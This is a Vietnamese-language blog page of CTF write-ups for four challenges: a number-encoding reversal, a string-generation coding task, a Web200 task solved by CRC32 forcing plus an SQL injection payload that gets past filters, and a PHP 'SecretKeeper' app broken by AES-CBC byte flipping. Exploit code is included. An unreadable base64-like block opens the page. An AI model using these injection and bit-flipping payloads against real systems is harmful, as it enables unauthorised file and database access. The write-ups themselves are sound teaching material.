bXBSTlU1VVdUSlplbFY1VGtkWk1VNUVUWGhPUjBVdwpUbnBaZUUxNlRUSlBSRkV3VG1wRk0xbFVW
VEpPUkZreFRtcGFhZ3BPYW1jelRucFZNVTVFV1RGWlZGRXpUbXBGTTFsVVVYbE9WRlV5ClRXcFZO
RTVFU1RCWmFsVXdUbFJaTVU1VVRURk9WRWt4VG1wVk1rNTZVWGRaVkZreFRrUlZlazVFVW1sT1Yw
VXhDazU2WXpST2Vra3kKVGxSUk1rNVVTVE5PUkZsNlRrUlpNRmxVVW14T1IxRXdUa1JSTVUxNlNU
Rk9WRnBxVGxSSk1GcHFWVEJOZWtreFRtcGplazVVV1RGUApSR04zVGxSVk1rMXFWVEFLVGtSWk1V
MTZWVEJPVkZreFRsUk5lRTVxVFRGT2FsVXlUbFJWTVUxNldtbE5lbXN4VFhwU2EwNVVXVEZPCmFr
MHdUbFJaTUU1RVVYbE9WRTB4VGxSYWFVMTZSVE5OYWxKc1RsUm5NQXBPYWxsNFRrZFJlazFxVlhs
T2FrVXhUbXBhYVU1WFJUTk4KYWxreFRrUlpNVTFxWXpCTlIwVXdXa1JWTVU1NlFUSlplbGw0VGpK
Rk1VNXFWVEpPVkZreFRucE5kMDU2WnpGT1JFMTRDazVYUlRCTwplbFV5VGxSbk1sbDZWVFJPVkZs
NlRYcFJlVTVVWnpGUFZGVXhUbFJWZWsxVVVteE9hbU16VFVSV2FFNXFWVEpaYWxwcVRrZE5NVTVx
ClVUSk9hbWN6VG5wVk1rNXRTWG9LVFZSamVVNUhWVEZPYWxVeVRsUlJNVTVxVVRGT1YwVXhUVlJW
TVU1dFNURlpWRkpwVG1wTk1sbDYKVlhsT2VrMHhUbFJhYWs1NlFUQmFWRlV5VG0xUk0wOUVWVEpP
VkZreFRucE5lQXBOZWxFeFRrUk5lVTVFV1ROTmFrSm9UbXBGZWsxNgpXVEJPVkZVeVRXcGFiRTVF
U1ROTlZGVXdUbTFKTVU1VVRYaE9WRmt4VG1wWk1FNVVWVEZOYWxwcFRYcHJNbGw2V1hsT1JGa3hD
azVVCll6Tk9WRmt3VG5wTk1VNTZZekZOVkZwcFRYcEZNRTU2V1hsT1JHY3dUbXBWTTA1VVdUQk9W
RkpvVGxSQk1WbFVWVE5OZWtVd1dsUloKTVU1dFRURk5hbFV5VGxSVk1scEVVVElLVG1wbk1rMVVa
R2hPVkZrelQwUlJlazV0VFRCYVZGVXhUbFJGTWxscVRUVk9WR014VFdwYQphazVVV1hwT1JGVXlU
a1JaTWs5RVl6Tk9WRmt5V1dwTmVFNVVXWGRaVkZKclRsUlpNUXBPYWxVeFRsUmpNRTU2WXpST1ZF
RXhUMVJWCk0wNTZUVE5QUkZKc1RtMU5NVTFVWXpST1ZGVXlXWHBXYUU1dFNUSk9SRTE2VGtSSk1V
MUVWVEpPYlVreFRtcFZNazVxVlRGT2Fsa3cKQ2s1NlVUSk5lbEV4VFh

Hy vọng các bạn thấy vui emo_popo_beauty

Lưu ý: Nếu các bạn vào ngay bây giờ, sẽ nhận được một thông báo không mấy dễ chịu, tuy nhiên đó không phải là lỗi (nó cũng không phải là một tính năng)emo_popo_canny

Hãy bookmark và quay lại sau emo_popo_angry

by

[30C3 CTF] fourier (Numbers200)

Heres one for those that like numbers and mathematics…

fourier.tar.gz

File dự phòng

Mở bài

Chúng ta được cung cấp cho 1 file fourier (elf) và 1 file flag.four (data). File fourier dùng để mã hóa, còn file flag.four, dĩ nhiên, là flag đã được mã hóa. feel_good

Thân bài

Sau một chút thời gian (rất dài) bỡ ngỡ khi thấy các thím ấy sử dụng GMP cho việc tính toán, mình cũng thể hiện được phẩm chất vượt trội trong thao tác mò code để mô phỏng lại thuật toán mã hóa như sau (nhìn chung thì khá dễ, mỗi tội hơi khó) emo_popo_shame:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
import random
 
random.seed(69)
 
in_file = open('flag', 'r').read()
out_file = open('flag.four', 'wb')
 
secret = int(in_file.encode('hex'), 16)
while (secret >= 24):
random_number = number_3 = 0
 
number_3 = secret - 4
number_3 <<= 2
number_3 -= 5
if (number_3 > 0x444):
number_3 = 0x444
 
random_number = random.randint(0, number_3 - 1)
random_number += 5
 
number_4 = 0
while (number_4 != random_number):
number_4 += 1
out_file.write('4')
 
out_file.write(' ')
number_4 = 4
number_5 = 0
 
while (number_4 < secret):
out_file.write('4')
 
number_5 = number_4
number_4 *= random_number
number_4 += 4
 
secret -= number_5
out_file.write(' ')
 
while (secret != 0):
secret -= 1
out_file.write('4')
 
out_file.close()

Ngoại trừ các thao tác mà mình đã đối chiếu và thấy khá tương đồng, vấn đề duy nhất tồn đọng là hàm random.

1
2
.text:0000000000400CA1                 lea     rdi, [rsp+98h+random_handle] ; Load Effective Address
.text:0000000000400CA6                 call    ___gmp_randinit_default ; Call Procedure

Target sử dụng hàm ___gmp_randinit_default và hơi lạ là khi mình debug lại thấy các kết quả random bị lặp lại. Mình cũng mất hơi nhiều thời gian cho việc cài đặt và chạy thử cái GMP này, rồi nhờ luật nhân quả nên sau đó điểm sáng xuất hiện: emo_popo_haha

1
2
3
4
number_4 = 0
while (number_4 != random_number):
number_4 += 1
out_file.write('4')

Ở đây ta thấy rằng chương trình làm một việc, đó là ghi ra giá trị sau khi random (mỗi đơn vị ứng với một byte ‘4‘). Và tổng quan thì cái thuật toán mã hóa khi hiểu đơn giản sẽ như sau:

  1. Nếu secret còn lớn hơn 24, thì chạy một vòng lặp, mỗi lượt ghi ra 2 giá trị:
    1. random_number.
    2. Số lần lặp có đụng chạm đến number_5 (mật danh là X_LOOP). Lưu ý rằng number_5 là một giá trị then chốt, vì nó là yếu tố duy nhất gây ra sự thay đổi giá trị của secret. emo_popo_choler
  2. Khi secret nhỏ hơn 24, ghi ra secret.

Như thế, nếu ta chia file flag.four ra các phần ngăn cách bởi dấu cách (0x20), giá trị mỗi phần là độ dài của phần đó (vd ‘444‘ = 3), thì hàm giải mã có nhiệm vụ:

  1. Đọc ngược từ phần cuối về phần đầu (tức phần đầu tiên được đọc sẽ là phần cuối của file).
  2. Gán secret = phần đầu.
  3. Chạy vòng lặp cho đến khi hết nội dung:
    1. Đọc phần tiếp theo, đó chính là số lần lặp của X_LOOP.
    2. Đọc phần tiếp theo, đó chính là random_number.
    3. Tất cả giá trị đều đã đủ, ta có thể tính toán được number_5, và thêm vào secret.
  4. Chuyển đổi secret từ DEC qua ASCII.

(lý do vì sao lại đọc từ cuối trở về mà không đọc từ đầu trở đi trong khi 2 hướng nó như nhau, thì là vì, mình thích thế đấy sexy_girl
Code minh họa:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
cipher = open('flag.four', 'r').read()
parts = cipher.split(' ')
 
secret = len(parts[len(parts) - 1])
part_index = len(parts) - 2
 
while (part_index > 0):
loop_count = len(parts[part_index])
random_number = len(parts[part_index - 1])
 
number_4 = 4
number_5 = 0
for i in range(loop_count):
number_5 = number_4
number_4 *= random_number
number_4 += 4
secret += number_5
 
part_index -= 2
 
print hex(secret)[2:-1].decode('hex')

Kết bài

1
30C3_the_challenge_is_named_fourier_what_else_did_you_expect?

emo_popo_smile

 

 

by

[SVATTT CTF 2013] Điệp vụ bất khả thi (ACM200)

Trong lúc các đồng đội của mình đang thực hiện thao tác trên các hệ thống nội bộ, Võ bằng kinh nghiệm truy vết của mình tìm ra 1 dịch vụ lạ trên một máy chủ đặt tại nhà riêng của Snowden. Tuy nhiên dịch vụ được bảo vệ bởi một số đoạn mã với yêu cầu vô cùng phức tạp mà chỉ có Anonymous mới nắm giữ bí quyết khởi tạo. Công việc tưởng bất khả thi nhưng chưa đầy 1 nốt nhạc sau, Võ đã nắm trong tay kết quả…
Challenge: nc 138.91.39.179 45456

Không đội nào giải được? Ok, đây là lúc để mình tỏa sáng still_dreaming

Nội dung chính

Kết nối đến server, ta nhận được lời chào:

    Prove that you are one of us! This is the new algorithm we have developed for our VenaSploit tool
We give you a set of character, you need to give me back a long enough string such that every 4 consecutive bytes is unique
All characters in the charset should be included for it to be valid. A charset is given between the tag <pre>
Example: <pre>01</pre> length: 8 , Answer: 00010111

Charset: <pre>01</pre>
Give me a pattern of size at least 16 using the given charset:

Như vậy, nhiệm vụ của chúng ta là tìm một chuỗi có kích thước n, được tạo bởi một tập các ký tự cho trước, với điều kiện là 4 ký tự bất kỳ liền kề không được trùng nhau (mình gọi là tính chất UEY). Ví dụ chuỗi:

0001110001100

là không hợp lệ, do 1100 xuất hiện 2 lần. Còn một điều kiện nữa là tất cả các ký tự trong charset đều phải được dùng, tuy nhiên điều này không mấy quan trọng.

Thuật toán

Kể từ ngày tham gia một cuộc thi chính thức đầu tiên (DEFCON thì phải) và giải được 2 bài thuộc thể loại coding tương tự, mình đã hiểu rằng mình sẽ yêu nó. Ít nhất thì đến bây giờ, mình vẫn còn cảm thấy hứng thú và bình yên với cái thể loại nhí nhảnh và nhộn nhịp này emo_popo_smile

Bắt đầu từ thử thách thứ nhất, tạo chuỗi dài 16 ký tự, charset là 01. Ta thấy kích thước charset là 2, và 2^4 = 16 (4 chính là kích thước nhóm ký tự không lặp lại). Người thì bảo là trùng hợp, nhưng mình thì, cũng nghĩ thế emo_popo_shame

Lúc đầu, mình cho rằng bài này cần đến thuật toán quay lui, nhưng sau đó, mình không chứng minh, nhưng đoán rằng có thể chứng minh được, là tại mỗi bước, luôn tìm được ký tự tiếp theo để chuỗi mới vẫn là chuỗi hợp lệ (thỏa mãn tính chất UEY). Lý do thì rất đơn giản: mình đã thử, và hình như đã thành công.

Nhưng như vậy vẫn là chưa đủ, điều quan trọng nằm ở việc tối ưu code, nhất là việc kiểm tra tính hợp lệ của chuỗi mới sau mỗi bước. Ok, việc chạy một vòng lặp đi suốt chiều dài chuỗi vài nghìn ký tự tốn không đáng là bao nhiêu công sức, tuy nhiên nếu tưởng tượng rằng cái công sức đó bị nhân lên vài nghìn lần, mọi thứ sẽ khác. Thêm nữa, mỗi khi thêm mới một ký tự, tại sao chúng ta lại phải kiểm tra lại cái phần đã được kiểm tra trước đó? Máy yếu thực sự không thích điều này emo_popo_choler

Giải pháp mình đưa ra sau vài tiếng đứng chôn chân trên xe bus, đó là lên danh sách sẵn các pattern (nhóm 4 ký tự), gọi là available_patterns dựa trên charset bài cho, khởi tạo giá trị 1 cho mỗi pattern (cũng chính là mỗi phần tử của mảng: key => value), và mỗi khi thêm một ký tự, ta kiểm tra pattern mới nhất (4 ký tự cuối của chuỗi) có nằm trong available_patterns hay không (giá trị của phần tử = 1), nếu có, ta coi ký tự vừa thêm hợp lệ (chưa được dùng), ta sẽ sử dụng nó, đồng thời gán phần tử ứng với pattern đó bằng 0; ngược lại, nếu giá trị của phần tử đã bằng 0, tức pattern đó đã được sử dụng, ta bỏ qua ký tự vừa thêm và thay bằng ký tự khác. Việc truy xuất giá trị một phần tử của mảng là nhanh vô cùng, nên ta khỏi lo bị chậm emo_popo_big_smile

Cơ mà một vấn đề mới lại phát sinh sau khi mình cài đặt thử, đó là đối với charset quá rộng, thì kích thước các pattern hợp lệ là rất lớn, chiếc máy nhỏ xinh của mình bị báo MemoryError ngay sau vài nốt nhạc. Hướng giải quyết là gì?

Là thôi không lập chỉ mục sẵn nữa, nhưng vẫn phải tìm cách để biết được pattern nào đã dùng rồi, pattern nào chưa. Điều này tưởng như đơn giản, nhưng hóa ra lại… đơn giản thật. Đó là với đối tượng dictionary (python), khi ta truy xuất một phần tử không có trong từ điển, exception sẽ nhảy ra (mà chắc ngôn ngữ nào cũng vậy thôi). Như thế, ta sử dụng một dictionary để lưu những pattern đã được dùng, thì khi kiểm tra, nếu có exception, tức là pattern đó chưa có trong từ điển (nghĩa là nó hợp lệ), và ngược lại. Chỉ có vậy thôi confuse

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
import socket
import sys
 
sys.setrecursionlimit(30000)
found = False
flag = ''
 
 
def gen_next_string(current_string, length, charset, used_patterns):
global found, flag
if found:
return flag
 
# progress
sys.stdout.write("current length: %d / %dr" % (len(current_string), length) )
sys.stdout.flush()
 
for char in charset:
new_string = current_string + char
new_pattern = new_string[-4:]
try:
used_patterns[new_pattern]
except: # if new_pattern has not been used
used_patterns[new_pattern] = 1
if len(new_string) < length:
next_string = gen_next_string(new_string, length, charset,used_patterns)
if (next_string != None):
return next_string
else:
found = True
flag = new_string
del used_patterns[new_pattern]
return None
 
 
def create_string(length, charset):
global found, flag
found = False
flag = ''
 
start_string = charset[0] * 4
used_patterns = {}
used_patterns[start_string] = 1
gen_next_string(start_string, length, charset, used_patterns)
print "n"
 
 
HOST = '138.91.39.179'
PORT = 45456
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
while True:
found = False
flag = ''
message = s.recv(1024)
message += s.recv(1024)
# print message
try:
charset = str(message.split('Charset: <pre>')[1].split('</pre>')[0])
length = int(message.split('Give me a pattern of size at least ')[1].split(' using the given charset: ')[0])
print 'len(charset):', len(charset), ', length:', length
 
create_string(length,charset)
# print 'flag:', flag
s.send(flag + "n")
except: # flag
print message
sys.exit(0)

Sau một thời gian chạy khá nhanh (có lâu thì cũng là do đề bài cho charset quá phức tạp và length quá dài thôi, chứ thuật toán thì generate ra flag nhanh lắm emo_popo_amazed), ta có cờ:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
len(charset): 2 , length: 16
current length: 15 / 16
 
len(charset): 3 , length: 81
current length: 80 / 81
 
len(charset): 6 , length: 1296
current length: 1295 / 1296
 
len(charset): 8 , length: 2506
current length: 2505 / 2506
 
len(charset): 26 , length: 2677
current length: 2676 / 2677
 
len(charset): 52 , length: 3283
current length: 3282 / 3283
 
len(charset): 98 , length: 4239
current length: 4238 / 4239
 
len(charset): 103 , length: 4315
current length: 4314 / 4315
 
len(charset): 179 , length: 6031
current length: 6030 / 6031
 
len(charset): 117 , length: 5049
current length: 5048 / 5049
 
len(charset): 107 , length: 4867
current length: 4866 / 4867
 
len(charset): 157 , length: 5173
current length: 5172 / 5173
 
len(charset): 164 , length: 6109
current length: 6108 / 6109
 
len(charset): 106 , length: 4882
current length: 4881 / 4882
 
len(charset): 174 , length: 5765
current length: 5764 / 5765
 
len(charset): 102 , length: 4488
current length: 4487 / 4488
 
len(charset): 156 , length: 5671
current length: 5670 / 5671
 
len(charset): 119 , length: 4767
current length: 4766 / 4767
 
len(charset): 111 , length: 4736
current length: 4735 / 4736
 
Your Flag: SVATTT_US3_PEDA_D0NT_Y0U?

Your Flag: SVATTT_US3_PEDA_D0NT_Y0U?

by

[SVATTT CTF 2013] Vết tích tại hiện trường (Web200)

Anonymous đã upload thành công một script backdoor của bọn chúng lên server ngân hàng Trung Ương với mục đích sẽ quay lại kiếm lợi sau này. Nhưng để truy xuất file, bạn cần phải biết password của chúng đã qui ước với nhau từ trước. Chỉ mất khoảng 10 phút, Chiến đã bypass được. Thế còn các bạn thì sao? :)
Challenge: Link
Hint: hint.txt

Chúng ta có một vùng nhập séc rét, và file hint.txt có nội dung xinh xinh:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
----------------------------snip snip-------------------------------------
$password = $_GET['password'];
$checkcrc = dechex(crc32($password));
 
if (strpos($password, "Anonymous") === false || $checkcrc !=="deadc0de")
{
echo "<br><font color='red'>"."Bad password"."</font><br>";
die();
}
 
.......................
$result = $db->query("SELECT * FROM web200  where code='$password'");
 
 
 
 
----------------------------snip snip-------------------------------------

Nội dung chính

Ta thấy rằng, yêu cầu của bài này là tìm một password thỏa mãn 2 điều kiện:

  1. Có chứa Anonymous.
  2. CRC32(password) = deadc0de.

Sau đó, (có lẽ là) flag sẽ được lấy từ database qua câu query:

1
SELECT * FROM web200  where code='$password'

Như vậy, nhiệm vụ của chúng ta, ngoài việc tìm password thỏa mãn 2 điều kiện vừa nói ở trên, còn có thêm một yếu tố nữa, đó là bypass được câu query SQL cuối cùng.

Với 2 nhiệm vụ đầu, công việc khá đơn giản, do giá trị CRC32 có thể được chỉnh sửa tùy ý bằng cách thay đổi 4 byte trong password. Một vài tool trên mạng cho phép chúng ta làm điều này, thay vì tự code, ví dụ như:

Giờ nếu ta tạo password ban đầu là:

Anonymousabcd

và dùng tool trên, kết quả cho ra:

Anonymous[q>_

Đây là một password khá đẹp, nó có chứa Anonymous, và CRC32 của nó đúng bằng deadc0de. Tuy nhiên khi submit, ta nhận thông báo sau:

Anonymous: Nice try! But You are doing it wrong :)

Ok, đây là điều chúng ta đã dự đoán từ trước, do vẫn chưa giải quyết được phần SQL.

Tuy vậy, việc inject câu query này xem chừng khá đơn giản, chúng ta sẽ thử với một password khá gia giáo và truyền thống:

Anonymous' OR 1=1--aaaa

Submit sau khi đã đưa nó qua forcecrc32.py, thông báo trả về xấu hơn một chút:

Bad input :)!

Vậy là có dính phải các ký tự bị cấm rồi too_sad

Thử thêm chút nữa, ta thấy các ký tự bị cấm dường như là: <space>, <comment> blah blah… tuy nhiên các từ khóa and, or, dấu nháy đơn () và dấu chấm phẩy (;) thì không bị. Hơ, thế cũng là đủ rồi emo_popo_look_down

Password cuối cùng mà ta lựa chọn sẽ là:

Anonymous'or'1'='1';aaaa

Makeup một chút với CRC32, ta được password xịn:

Anonymous'or'1'='1';nx9Dxx92

Submit:

Anonymous: Not bad! Here is your flag

SVATTT_crc_0r_n0t_CRC

emo_popo_misdoubt

by

[WarGameVN CTF] SecretKeeper (Web300)

Đây là nơi trao đổi bí mật giữa các tên trùm.

Source: ~

 

Rất cảm ơn BTC vì đã gìn giữ để cái URL nó sống đến tận bây giờ sweet_kiss

Đây là một bài mà hồi đó, mình nhìn nó với một sự ngưỡng mộ sâu sắc, và thậm chí, ngay cả khi có một vài member kiệt xuất trong team mình miên man bình luận về nó thì mình vẫn như một thằng lơ ngơ không hiểu gì.

Mình thích cái cảm giác lâu lâu quay lại một bài nào đó, một bài mà trước đây mình không làm được, thậm chí không biết nó hỏi cái gì, nó cần cái gì, rồi sau đó nó hét lên với mình: “Cờ của mày đây!”, cảm giác thật thanh thản và bình yên sexy_girl

Ngày còn bé (cụ thể là cấp 3), mình cực kỳ yếu tích phân, và dù cho đã cố lăn lộn với nó trong suốt 3 năm học, cộng với vài ngày sát kỳ thi ĐH, mình vẫn ra về tay trắng. Mình nhớ như in cái cảm giác đó, cái cảm giác mà mình thực sự đã sinh ra vì một mục đích khác, một mục đích mà không liên quan khỉ gì đến tích phân cả, rằng thì là cả đời này mình cũng vẫn nấp dưới danh nghĩa của một thằng không thể giải được bài tích phân nào trong đề thi ĐH emo_popo_cry

Ấy thế mà lên ĐH, mình lại bá đạo vô cùng về mấy cái thứ gớm ghiếc này, tất cả thay đổi, cuộc sống thay đổi, lòng người cũng thay đổi. Mình từng ghét Vật Lý, rồi mình yêu Vật Lý, mình từng ghét Console, rồi mình yêu Console, mình từng ghét Tích phân, và rồi mình yêu Tích phân. Lý do cũng chỉ có một, đó là nếu ta yêu một ai đó, ta sẽ… không còn ghét họ nữa (đệch after_boom). Thôi nói tóm lại, là một khi mình đã thấy mặt lợi ích của cái gì đó mang lại, thì mình sẽ không còn thấy nó vô bổ nữa…

ops emo_popo_waaaht emo_popo_sweat

Nội dung chính

Ở bài này, chúng ta có một vùng để nhập séc rét, điền thử:

^_^

và nhấn Save, chúng ta có một cái link:

http://challenges.wargame.vn:1337/web300_c4d7c1d9c925b4021adf5e192315ecb9/?file=dbf8adc50a348b9e808d204825c7aed2d4430f900ed7b96daec2a3c1d6665a2792cdb3104d2666e64e069d87cd286765d29b0c16ca1ab2d26249735974d6fb50&sign=730646501b5d8c9a234686a9bcc580bb

Khá dài và khá hãi… Xem source thì có được:

1
2
3
4
<blockquote class="curly-quotes" cite="./secret/b764b44fd336b8281b62b257501ad3c6">
                            ^_^
 
</blockquote>

Như đề bài đưa, source nằm ở index.phps, xem nó thôi:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
<?php session_start(); ?>
<!DOCTYPE html>
<!--[if lt IE 7]> <html class="lt-ie9 lt-ie8 lt-ie7" lang="en"> <![endif]-->
<!--[if IE 7]> <html class="lt-ie9 lt-ie8" lang="en"> <![endif]-->
<!--[if IE 8]> <html class="lt-ie9" lang="en"> <![endif]-->
<!--[if gt IE 8]><!--> <html lang="en"> <!--<![endif]-->
<head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <title>SecretKeeper v1.0</title>
  <link rel="stylesheet" href="css/style.css">
  <!--[if lt IE 9]><script src="//html5shim.googlecode.com/svn/trunk/html5.js"></script><![endif]-->
</head>
<body><br /><br /><br />
 
    <div class="mainform">
      <h1>SecretKeeper v1.0</h1>
        <?php
 
            function strToHex($string)
            {
                $hex='';
                for ($i=0; $i < strlen($string); $i++){
                    $tmp = dechex(ord($string[$i]));
                    $hex .= (strlen($tmp)==1)?"0".$tmp:$tmp;
                }
                return $hex;
            }
            function hexToStr($hex)
            {
                $string='';
                for ($i=0; $i < strlen($hex)-1; $i+=2)
                    $string .= chr(hexdec($hex[$i].$hex[$i+1]));
                return $string;
            }
            //
            // encrypt + decrypt AES
            //
            include("init.php"); // define _KEY,_IV,_SECRET
            // flag in ./secret/flag.php
 
            function encrypt_($str){
                return strToHex(mcrypt_encrypt(MCRYPT_RIJNDAEL_128, _KEY, $str, MCRYPT_MODE_CBC,_IV));
            }
            function decrypt_($str){
                return rtrim(mcrypt_decrypt(MCRYPT_RIJNDAEL_128, _KEY, hexToStr($str), MCRYPT_MODE_CBC,_IV),"");
            }
            function hmac_($msg,$secret){
                return hash_hmac('md5',$msg,$secret);
            }
 
            if(!empty($_POST['secret']) && is_string($_POST['secret']) && strlen($_POST['secret']) < 1337){
                 $secret_hmac = md5(_SECRET.rand(0,1337),true);
                 $secret_filename = md5(session_id.$secret_hmac);
                 file_put_contents("./secret/".$secret_filename,$_POST['secret']);
                 $secret_link = encrypt_($secret_filename."|".$secret_hmac);
                 echo "<br /><p align='center'><a class='button button-blue' href='?file={$secret_link}&sign=".hmac_($secret_filename,$secret_hmac)."'>Your secret</p></a>";
 
            }elseif(!empty($_GET['file'])){
                $decrypt = explode("|",decrypt_($_GET['file']));
                $secret_filename = $decrypt[0];
                $secret_hmac = $decrypt[1];
                $hmac_ = $_GET['sign'];
                $error = false;
                if(strlen($secret_hmac) != 16){
                    echo "HMAC: Bad length! (".strlen($secret_hmac).")<br />";
                    $error = true;
                }
                if(hmac_($secret_filename,$secret_hmac)!==$hmac_){
                    echo "HMAC: Not match!<br />";
                    $error = true;
                }
 
 
        ?>
                <section class="notepaper">
                    <figure class="quote">
                        <blockquote class="curly-quotes" cite="./secret/<?=$secret_filename?>">
                            <?php
                                if(!$error)
                                    echo file_get_contents("./secret/".basename($secret_filename)); // anti directory traversal
                                else
                                    echo "ERROR!";
                            ?>
 
                        </blockquote>
                    </figure>
                </section>
        <?php
            }else{
        ?>
        <form action="?save" method="POST">
            <p><textarea name="secret" rows="10" cols="80" placeholder="Your secret!"></textarea></p>
            <p align="center"><input type="submit" name="confirm" value="Save" class="button button-blue"></p>
        </form>
        <?php
            }
        ?>
 
    </div>
 
</body>
</html>

Ta sẽ chia code làm 2 phần chính: Mã hóaGiải mã, còn nhiệm vụ của chúng ta là đọc file ./secret/flag.php.

Mã hóa

1
2
3
4
5
6
7
8
if(!empty($_POST['secret']) && is_string($_POST['secret']) && strlen($_POST['secret']) < 1337)
{
     $secret_hmac = md5(_SECRET.rand(0,1337),true);
     $secret_filename = md5(session_id.$secret_hmac);
     file_put_contents("./secret/".$secret_filename,$_POST['secret']);
     $secret_link = encrypt_($secret_filename."|".$secret_hmac);
     echo "<br /><p align='center'><a class='button button-blue' href='?file={$secret_link}&sign=".hmac_($secret_filename,$secret_hmac)."'>Your secret</p></a>";
}

$secret_hmac, $secret_filename được tạo ngẫu nhiên, sau đó ghép vào với ký tự ngăn cách là ‘|‘, cuối cùng mã hóa thành tham số file cho url. Tham số còn lại, sign, dùng cho mục đích kiểm tra tính hợp lệ của $secret_filename (mình sẽ trình bày sau).

Nói chung phần này không có gì nhiều, ta kệ nó, cho nó chơi một mình.

Giải mã

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
elseif(!empty($_GET['file']))
{
    $decrypt = explode("|",decrypt_($_GET['file']));
    $secret_filename = $decrypt[0];
    $secret_hmac = $decrypt[1];
    $hmac_ = $_GET['sign'];
    $error = false;
    if(strlen($secret_hmac) != 16){
        echo "HMAC: Bad length! (".strlen($secret_hmac).")<br />";
        $error = true;
    }
    if(hmac_($secret_filename,$secret_hmac)!==$hmac_){
        echo "HMAC: Not match!<br />";
        $error = true;
    }
    <section class="notepaper">
    <figure class="quote">
        <blockquote class="curly-quotes" cite="./secret/<?=$secret_filename?>">
            <?php
                if(!$error)
                    echo file_get_contents("./secret/".basename($secret_filename)); // anti directory traversal
                else
                    echo "ERROR!";
            ?>
 
        </blockquote>
    </figure>
</section>
<?php
}

Trình tự thực hiện là:

  1. Giải mã tham số file.
  2. Chia làm 2 phần, ngăn cách bởi ký tự ‘|‘.
  3. Phần 1 là $secret_filename, phần 2 là $secret_hmac.
  4. Dùng tham số sign để kiểm tra tính hợp lệ của $secret_filename, nếu ok thì in ra nội dung của nó.

Như thế, chúng ta thấy được 2 việc chính cần làm:

  1. Xác định tham số file để $secret_filename trỏ đến file ./secret/flag.php.
  2. Xác định tham số sign ứng với tham số file để pass bước 4.

Xác định tham số file

Thuật toán mã hóa được sử dụng là AES 128bit (16 byte cho mỗi block), mode CBC, nên chúng ta có thể nghĩ ngay đến Byte Flipping emo_popo_smile

Do $secret_filename là MD5, kích thước 32 byte, chúng ta sẽ can thiệp vào block đầu tiên của cipher, để thay đổi block thứ hai của plain text. Nhưng cũng cần lưu ý rằng block đầu của plain text sẽ thành rác, và chúng ta cần chỉnh sửa đường dẫn của file flag cho phù hợp. Ví dụ, ta có một đường dẫn hợp lệ là:

^#%&$%$@@$#%%^$abcde/../flag.php

Bắt đầu từ url nhận được lúc đầu, ta dùng đoạn code sau để thu được tham số file mong muốn:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
def get_filename(file):
url = 'http://challenges.wargame.vn:1337/web300_c4d7c1d9c925b4021adf5e192315ecb9/?file=%s&sign=%s' % (file, 'xxx')
source = get_url_content(url)
 
filename = source.split('cite="./secret/')[1].split('"')[0]
return filename
 
 
# === Byte Flipping 1 ===
target = 'aaaa/../flag.php'
filename = 'b764b44fd336b8281b62b257501ad3c6'
file = 'dbf8adc50a348b9e808d204825c7aed2d4430f900ed7b96daec2a3c1d6665a2792cdb3104d2666e64e069d87cd286765d29b0c16ca1ab2d26249735974d6fb50'.decode('hex')
for pos in range(len(target)):
file = change_byte(file, pos, chr(ord(filename[pos+16]) ^ ord(target[pos]) ^ (ord(file[pos]))))
print 'file:', file.encode('hex')
 
filename = get_filename(file.encode('hex'))
print 'filename: ', filename
# === Byte Flipping 1 ===

1
2
file: 8bfbfa9647289086d3d1704e6f84a594d4430f900ed7b96daec2a3c1d6665a2792cdb3104d2666e64e069d87cd286765d29b0c16ca1ab2d26249735974d6fb50
filename:  _:$╓¥ì≤¬²æ╗Uz[aaaa/../flag.php

Khá ổn emo_popo_nosebleed

Xác định tham số sign

Dù rằng $secret_filename xem chừng đã hợp lệ, ta vẫn chưa đọc được nội dung của nó, do bị bước 4 chặn lại. Để ý rằng, sign được tính như sau:

1
$sign = hmac_($secret_filename,$secret_hmac)

mặt khác, cả $secret_filename $secret_hmac đều là các thành phần trong tham số file, được ngăn cách bởi ký tự ‘|‘, nhưng task chỉ hiển thị $secret_filename cho ta thấy.

Để có $secret_hmac, điều duy nhất mà ta làm được, đó là Flipping thêm một Byte nữa, mục đích là thay đổi ký tự ‘|‘ thành ký tự khác, khi đó câu lệnh:

1
2
$decrypt = explode("|",decrypt_($_GET['file']));
$secret_filename = $decrypt[0];

sẽ trả về $secret_filename chứa cả $secret_hmac (do không còn ký tự ngăn cách), và bằng cách lấy 16 ký tự cuối, ta có thứ mình cần emo_popo_big_smile

Ta biết rằng ký tự ‘|‘ sẽ ở block 3 ($secret_filename là MD5, kích thước 32 byte = 2 block), nên để thay đổi nó, ta sẽ can thiệp vào block 2 của cipher, mà cụ thể là byte thứ 17. Tất nhiên điều này sẽ làm hỏng $secret_filename, nhưng hiện tại nó không còn quan trọng nữa.

1
2
3
4
file = change_byte(file, 16, '1')
filename = get_filename(file.encode('hex'))
secret_hmac = filename[-16:]
print 'secret_hmac:', secret_hmac.encode('hex')

1
secret_hmac: 271876ad58fdba9d870d1c6ad3f6f94c

Giờ thì chúng ta đã có thể thoải mái tính sign, like a boss ah adore:

1
2
sign = hmac.new(secret_hmac, secret_filename, hashlib.md5).hexdigest();
print 'sign:', sign

1
sign: 68b3b5f8599fb8939ce1b5b9cb7ce46a

Tổng kết

